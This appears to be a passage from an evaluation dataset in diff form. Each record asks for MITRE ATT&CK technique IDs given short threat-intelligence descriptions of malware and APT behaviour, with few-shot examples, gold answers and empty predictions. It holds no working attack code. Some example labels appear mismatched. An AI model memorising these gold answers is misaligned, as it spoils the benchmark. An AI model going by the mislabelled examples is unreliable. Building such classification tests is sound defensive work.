StrifeWater can collect the time zone from the victim's machine.\n\t - T1124: System Time Discovery\n", + "input": "BLUELIGHT can check to see if the infected machine has VM tools running.", + "gold": "- T1497.001: Virtualization/Sandbox Evasion - System Checks", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Agent Tesla has he ability to perform anti-sandboxing and anti-virtualization checks.\n\t - T1497: Virtualization/Sandbox Evasion\n- Text: Figure 5 shows the splash image displayed by the Enigma protector prior to executing the malicious payload, which is a wallpaper image available at wallpaperswide.com. The splash screen feature acts as a sandbox evasion technique, as it requires user interaction in the form of clicking the screen before the malicious code runs\n\t - T1497.002: Virtualization/Sandbox Evasion - User Activity Based Checks\n- Text: Naikon has convinced victims to open malicious attachments to execute malware.\n\t - T1204.002: User Execution - Malicious File\n", + "input": "Hancitor has used a macro to check that an ActiveDocument shape object in the lure message is present. If this object is not found, the macro will exit without downloading additional payloads.", + "gold": "- T1497: Virtualization/Sandbox Evasion", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Figure 2: De-obfuscated code scheduling the second task to run a script embedded in a blog page The last section of script embedded in 29[.]html then downloads Revenge RAT and injects the binary into the memory of a running process, as seen in Figure 3\n\t - T1055: Process Injection\n- Text: used UPX to pack files.\n\t - T1027.002: Obfuscated Files or Information - Software Packing\n- Text: This process executes a command to maliciously use the legitimate wmic.exe to initialize an XSL Script Processing (MITRE Technique T1220) attack. The attack executes embedded JScript or VBScript in an XSL stylesheet located on a remote domain (qnccmvbrh.wilstonbrwsaq[.]pw\n\t - T1220: XSL Script Processing\n", + "input": "Ryuk can use anti-disassembly and code transformation obfuscation techniques.", + "gold": "- T1027: Obfuscated Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: BLUELIGHT can uninstall itself.\n\t - T1070.004: Indicator Removal - File Deletion\n- Text: Stuxnet used xp_cmdshell to store and execute SQL code.\n\t - T1505.001: Server Software Component - SQL Stored Procedures\n- Text: Proton removes logs from \"/var/logs\" and \"/Library/logs\".\n\t - T1070.002: Indicator Removal - Clear Linux or Mac System Logs\n", + "input": "Stuxnet removes itself from the system through a DLL export by deleting specific files and stored procedures.", + "gold": "- T1070: Indicator Removal", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: As can be seen from the Table 2 above, Kazuar has an extensive command set, many of which are similar in functionality as other backdoor Trojans. However, a few commands specific to Kazuar appear to be unique and are worth further discussion\n\t - T1029: Scheduled Transfer\n- Text: TrickBot has used \"printf\" and file I/O loops to delay process execution as part of API hammering.\n\t - T1497.003: Virtualization/Sandbox Evasion - Time Based Evasion\n- Text: Another interesting finding is that Bazar Loader has now implemented a Domain Generation Algorithm using the current date as a seed\n\t - T1568.002: Dynamic Resolution - Domain Generation Algorithms\n", + "input": "Shark can pause C2 communications for a specified time.", + "gold": "- T1029: Scheduled Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: FrameworkPOS can identifiy payment card track data on the victim and copy it to a local file in a subdirectory of C:\\Windows\\.\n\t - T1074.001: Data Staged - Local Data Staging\n- Text: Avira\u2019s Advanced Threat Research team, has been tracking Mustang Panda APT for a while. According to Avira\u2019s telemetry data, Mustang Panda mostly targets Asia-Pacific (APAC) countries and uses Cobalt or PlugX as payload\n\t - T1204.002: User Execution - Malicious File\n\t - T1049: System Network Connections Discovery\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1057: Process Discovery\n\t - T1016: System Network Configuration Discovery\n\t - T1083: File and Directory Discovery\n- Text: Sowbug extracted Word documents from a file server on a victim network.\n\t - T1039: Data from Network Shared Drive\n", + "input": "Honeybee performs data exfiltration is accomplished through the following command-line command: \"from (- --).txt\".", + "gold": "- T1020: Automated Exfiltration", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This thread searches for for files with the following extensions on removable drives and copies them to \u2018c:\\system\u2019 every 5 seconds\n\t - T1005: Data from Local System\n\t - T1083: File and Directory Discovery\n\t - T1074.001: Data Staged - Local Data Staging\n\t - T1119: Automated Collection\n\t - T1025: Data from Removable Media\n- Text: Cobalt Strike's \"beacon\" payload can collect information on process details.\n\t - T1057: Process Discovery\n- Text: Avira\u2019s Advanced Threat Research team, has been tracking Mustang Panda APT for a while. According to Avira\u2019s telemetry data, Mustang Panda mostly targets Asia-Pacific (APAC) countries and uses Cobalt or PlugX as payload\n\t - T1204.002: User Execution - Malicious File\n\t - T1049: System Network Connections Discovery\n\t - T1560.001: Archive Collected Data - Archive via Utility\n\t - T1057: Process Discovery\n\t - T1016: System Network Configuration Discovery\n\t - T1083: File and Directory Discovery\n", + "input": "BLUELIGHT can enumerate files and collect associated metadata.", + "gold": "- T1083: File and Directory Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Carberp can download and execute new plugins from the C2 server.\n\t - T1105: Ingress Tool Transfer\n- Text: Here is a list of the platforms used by this variant: Twitter, Yandex and Mediafire\n\t - T1102: Web Service\n- Text: Patchwork has used BITS jobs to download malicious payloads.\n\t - T1197: BITS Jobs\n", + "input": "Ecipekac can download additional payloads to a compromised host.", + "gold": "- T1105: Ingress Tool Transfer", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: In green, functions from Keychaindump C&C communication Keydnap is using the onion.to Tor2Web proxy over HTTPS to report back to its C&C server\n\t - T1090: Proxy\n- Text: uses a dropper called MaoCheng that harvests a stolen digital signature from Adobe Systems.\n\t - T1553.002: Subvert Trust Controls - Code Signing\n- Text: FIN10 has relied on publicly-available software to gain footholds and establish persistence in victim environments.\n\t - T1588.002: Obtain Capabilities - Tool\n", + "input": "CopyKittens has used the AirVPN service for operational activity.", + "gold": "- T1090: Proxy", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HEXANE has used a PowerShell-based keylogger named `kl.ps1`.\n\t - T1056.001: Input Capture - Keylogging\n- Text: Catchamas obtains application windows titles and then determines which windows to perform Screen Capture on.\n\t - T1010: Application Window Discovery\n- Text: In at least one engagement, we observed Blue Mockingbird seemingly experimenting with different tools to create SOCKS proxies (T1090: Proxy) for pivoting. These tools included a fast reverse proxy (frp), Secure Socket Funneling (SSF), and Venom. In one instance, the adversary also tinkered with PowerShell reverse TCP shells and a reverse shell in DLL form (T1059.001: PowerShell\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n", + "input": "BabyShark has a PowerShell-based remote administration ability that can implement a PowerShell or C# based keylogger.", + "gold": "- T1056.001: Input Capture - Keylogging", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: compromised McAfee ePO to move laterally by distributing malware as a software deployment task.\n\t - T1072: Software Deployment Tools\n- Text: has the ability to scan for security tools such as firewalls and antivirus tools.\n\t - T1518.001: Software Discovery - Security Software Discovery\n- Text: The \"ZR\" variant of will check to see if known host-based firewalls are installed on the infected systems. will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n", + "input": "It is believed that a patch management system for an anti-virus product commonly installed among targeted companies was used to distribute the Wiper malware.", + "gold": "- T1072: Software Deployment Tools", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: HAFNIUM has used 7-Zip and WinRAR to compress stolen files for exfiltration.\n\t - T1560.001: Archive Collected Data - Archive via Utility\n- Text: The compressed_data field is compressed using the common ZLIB compression algorithm. Additionally, in the event data is being sent via HTTP rather than HTTPS, the following additional encryption algorithm is applied to the POST data\n\t - T1560.002: Archive Collected Data - Archive via Library\n\t - T1573.001: Encrypted Channel - Symmetric Cryptography\n- Text: RARM Creates RAR files per logical drive containing data with timestamps for the past 30 days, then uploads RAR to the C2 server using a POST command at the path \u201c/FeedBack.php\u201d\n\t - T1560: Archive Collected Data\n", + "input": "APT28 has used a variety of utilities, including WinRAR, to archive collected data with password protection.", + "gold": "- T1560.001: Archive Collected Data - Archive via Utility", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: This campaign is different from prior activity because a new dropper was observed being used by Rocke that is written in Go (Golang) instead of Python. The detection for the malware on VirusTotal (VT) is nearly non-existent. Figure 1, below, shows the detections for the most recent sample submitted to VT. It can be seen that only one engine successfully detected it as malicious\n\t - T1057: Process Discovery\n- Text: The following commands are supported by the malware: Command ID Description 00 00 00 Content after command ID is written to: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad1.exe 00 00 01 Deletes the files: C:\\Users\\[Username]\\AppData\\Local\\Temp\\notepad.exe C:\\Users\\[Username]\\AppData\\Local\\Temp\\newnotepad.exe 00 00 02 Malware exits 00 00 03 Malware downloads the URL that follows the command ID\n\t - T1033: System Owner/User Discovery\n\t - T1204: User Execution\n- Text: Ke3chang uses command-line interaction to search files and directories.\n\t - T1083: File and Directory Discovery\n", + "input": "Zebrocy collects the OS version, computer name and serial number for the storage volume C:\\. Zebrocy also runs the \"systeminfo\" command to gather system information.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: More information about the OwaAuth web shell is available in Appendix C\n\t - T1505.003: Server Software Component - Web Shell\n- Text: The notes also contain a threat to leak private information that has been collected from the target if the ransom is not paid\n\t - T1484.001: Domain or Tenant Policy Modification - Group Policy Modification\n\t - T1078.002: Valid Accounts - Domain Accounts\n- Text: Night Dragon has used compromised VPN accounts to gain access to victim systems.\n\t - T1078: Valid Accounts\n\t - T1133: External Remote Services\n", + "input": "Operation Wocao has used their own web shells, as well as those previously placed on target systems by other threat actors, for reconnaissance and lateral movement.", + "gold": "- T1505.003: Server Software Component - Web Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: ShimRat has decompressed its core DLL using shellcode once an impersonated antivirus component was running on a system.\n\t - T1140: Deobfuscate/Decode Files or Information\n- Text: Exaramel for Linux uses RC4 for encrypting the configuration.\n\t - T1027: Obfuscated Files or Information\n- Text: How about DPAPI with keys tied per user & system. Volume serial ID keying. See the APT41 talk #FireEyeSummit7:19 PM \u00b7 Oct 30, 2019\u00b7Twitter for Android12 Retweets1 Quote Tweet35 LikesNick Carr@ItsReallyNick\n\t - T1480.001: Execution Guardrails - Environmental Keying\n", + "input": "Grandoreiro can decrypt its encrypted internal strings.", + "gold": "- T1140: Deobfuscate/Decode Files or Information", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Javali has been delivered as malicious e-mail attachments.\n\t - T1566.001: Phishing - Spearphishing Attachment\n- Text: Bad Rabbit has been executed through user installation of an executable disguised as a flash installer.\n\t - T1204.002: User Execution - Malicious File\n- Text: FIN7 has conducted broad phishing campaigns using malicious links.\n\t - T1566.002: Phishing - Spearphishing Link\n", + "input": "KONNI has been delivered via spearphishing campaigns through a malicious Word document.", + "gold": "- T1566.001: Phishing - Spearphishing Attachment", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Aside from stealing credentials from applications, it also steals the following information from several popular web browsers such as Google Chrome, Mozilla Firefox, Internet Explorer, and Microsoft Edge\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: Leafminer used several tools for retrieving login and password information, including LaZagne.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1555: Credentials from Password Stores\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: Along with the EDRPOU numbers, the backdoor collects proxy and email settings, including usernames and passwords, from the M.E.Doc application\n\t - T1087.003: Account Discovery - Email Account\n", + "input": "H1N1 dumps usernames and passwords from Firefox, Internet Explorer, and Outlook.", + "gold": "- T1555.003: Credentials from Password Stores - Credentials from Web Browsers", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: SpicyOmelette can identify payment systems, payment gateways, and ATM systems in compromised environments.\n\t - T1018: Remote System Discovery\n- Text: JAVASCRIPT CODE SNIPPETS: The first stage JavaScript copies additional JavaScript code snippets in txt format from the RTF document into a random directory \u201cC:\\Users\\\\\\\u201d\n\t - T1033: System Owner/User Discovery\n\t - T1064: Scripting\n- Text: Tropic Trooper has used Windows command scripts.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "An APT3 downloader uses the Windows command \"\"cmd.exe\" /C whoami\". The group also uses a tool to execute commands on remote computers.", + "gold": "- T1059.003: Command and Scripting Interpreter - Windows Command Shell", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Grandoreiro can use VBScript to execute malicious code.\n\t - T1059.005: Command and Scripting Interpreter - Visual Basic\n- Text: We did not observe the initial access for this case but assess with medium to high confidence that a malicious email campaign was used to deliver an Excel (xls) document. Following the opening of the xls document, the initial Qbot DLL loader was downloaded and saved to disk. Interestingly, the name of the DLL contained a .html extension to disguise the portable executable nature of the payload. Once executed, the Qbot process creates a scheduled task to elevate itself to system.\n\t - T1566.001: Phishing - Spearphishing Attachment\n\t - T1204.002: User Execution - Malicious File\n\t - T1566.002: Phishing - Spearphishing Link\n- Text: DanBot has the ability to execute arbitrary commands via `cmd.exe`.\n\t - T1059.003: Command and Scripting Interpreter - Windows Command Shell\n", + "input": "Gorgon Group has used macros in Spearphishing Attachments as well as executed VBScripts on victim machines.", + "gold": "- T1059.005: Command and Scripting Interpreter - Visual Basic", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The malicious payload associated with the campaign appears to be a new version of Zeus Panda, a banking trojan designed to stealing banking and other sensitive credentials for exfiltration by attackers. The payload that Talos analyzed was a multi-stage payload, with the initial stage featuring several anti-analysis techniques designed to make analysis more difficult and prolonged execution to avoid detection. It also featured several evasion techniques designed to ensure that the malware would not execute properly in automated analysis environments, or sandboxes. The overall operation of the Zeus Panda banking trojan has been well documented, however Talos wanted to provide additional information about the first stage packer used by the malware. The malware will first query the system's keyboard mapping to determine the language used on the system. It will terminate execution if it detects the any of the following keyboard mappings\n\t - T1059.001: Command and Scripting Interpreter - PowerShell\n\t - T1614.001: System Location Discovery - System Language Discovery\n- Text: After all the initial HTTP GET requests, the malware starts to gather JSON-formatted system data. For all the fixed drives in the system, the network module stores the disk name and size, as well as computer and user name, Windows directory, host IP, etc\n\t - T1082: System Information Discovery\n- Text: SDBbot can collected the country code of a compromised machine.\n\t - T1614: System Location Discovery\n", + "input": "SharpStage has checked the system settings to see if Arabic is the configured language.", + "gold": "- T1082: System Information Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The malware continues by creating a service named mssecsvc2.0 with a binary path pointing to the running module with the arguments \"-m security\". Once created, the malware starts the service\n\t - T1543.003: Create or Modify System Process - Windows Service\n- Text: BlackEnergy has enabled the \"TESTSIGNING\" boot configuration option to facilitate loading of a driver component.\n\t - T1553.006: Subvert Trust Controls - Code Signing Policy Modification\n- Text: This update to Emissary allowed the Trojan to run as a service. The configuration now contains settings for the Emissary service, which the Trojan will store in and access from the following registry keys:\n\t - T1574.011: Hijack Execution Flow - Services Registry Permissions Weakness\n", + "input": "Duqu creates a new service that loads a malicious driver when the system starts. When Duqu is active, the operating system believes that the driver is legitimate, as it has been signed with a valid private key.", + "gold": "- T1543.003: Create or Modify System Process - Windows Service", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Cadelspy has the ability to steal data from the clipboard.\n\t - T1115: Clipboard Data\n- Text: Metamorfo has a function that can watch the contents of the system clipboard for valid bitcoin addresses, which it then overwrites with the attacker's address.\n\t - T1565.002: Data Manipulation - Transmitted Data Manipulation\n- Text: Before writing to disk, Kwampirs inserts a randomly generated string into the middle of the decrypted payload in an attempt to evade hash-based detections.\n\t - T1027.001: Obfuscated Files or Information - Binary Padding\n", + "input": "RunningRAT contains code to open and copy data from the clipboard.", + "gold": "- T1115: Clipboard Data", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: GRIFFON has used \"sctasks\" for persistence.\n\t - T1053.005: Scheduled Task/Job - Scheduled Task\n- Text: The Leeson, Neoichor, and NumbIdea malware families typically use the Internet Explorer (IE) COM interface to connect and receive commands from hardcoded C2 servers\n\t - T1559.001: Inter-Process Communication - Component Object Model\n- Text: APT39 has used the BITS protocol to exfiltrate stolen data from a compromised host.\n\t - T1197: BITS Jobs\n", + "input": "Valak has used scheduled tasks to execute additional payloads and to gain persistence on a compromised host.", + "gold": "- T1053.005: Scheduled Task/Job - Scheduled Task", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: At the second stage, the attackers remotely connected to the device and scanned the local network seeking to gain access to public shared folders, web servers, and any other open resources. The aim was to harvest information about the network, above all, servers and workstations used for making payments. If the firewall blocked access from one segment of the network to another, but allowed a reverse connection, the attackers used a different payload to build tunnels\n\t - T1135: Network Share Discovery\n- Text: has detached network shares after exfiltrating files, likely to evade detection.\n\t - T1070.005: Indicator Removal - Network Share Connection Removal\n- Text: Stuxnet enumerates user accounts of the local host.\n\t - T1087.001: Account Discovery - Local Account\n", + "input": "InvisiMole can gather network share information.", + "gold": "- T1135: Network Share Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: Anchor can terminate itself if specific execution flags are not present.\n\t - T1480: Execution Guardrails\n- Text: RobbinHood stops 181 Windows services on the system before beginning the encryption process.\n\t - T1489: Service Stop\n- Text: SslMM identifies and kills anti-malware processes.\n\t - T1562.001: Impair Defenses - Disable or Modify Tools\n", + "input": "APT33 has used kill dates in their malware to guardrail execution.", + "gold": "- T1480: Execution Guardrails", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: The Cobalt Strike System Profiler can discover applications through the browser and identify the version of Java the target has.\n\t - T1518: Software Discovery\n- Text: APT33 has used a variety of publicly available tools like LaZagne to gather credentials.\n\t - T1003.004: OS Credential Dumping - LSA Secrets\n\t - T1003.005: OS Credential Dumping - Cached Domain Credentials\n\t - T1552.001: Unsecured Credentials - Credentials In Files\n\t - T1555: Credentials from Password Stores\n\t - T1555.003: Credentials from Password Stores - Credentials from Web Browsers\n- Text: QakBot has the ability to capture web session cookies.\n\t - T1539: Steal Web Session Cookie\n", + "input": "Orz can gather the victim's Internet Explorer version.", + "gold": "- T1518: Software Discovery", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n\nExamples:\n- Text: wmic.exe is a powerful, native Windows command line utility used to interact with Windows Management Instrumentation (WMI)\n\t - T1047: Windows Management Instrumentation\n- Text: MURKYTOP: a command-line reconnaissance tool\n\t - T1059: Command and Scripting Interpreter\n- Text: at can be used to schedule a task on a system to be executed at a specific date or time.\n\t - T1053.002: Scheduled Task/Job - At\n", + "input": "StoneDrill has used the WMI command-line (WMIC) utility to run tasks.", + "gold": "- T1047: Windows Management Instrumentation", + "predicted": "" + }, + { + "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, 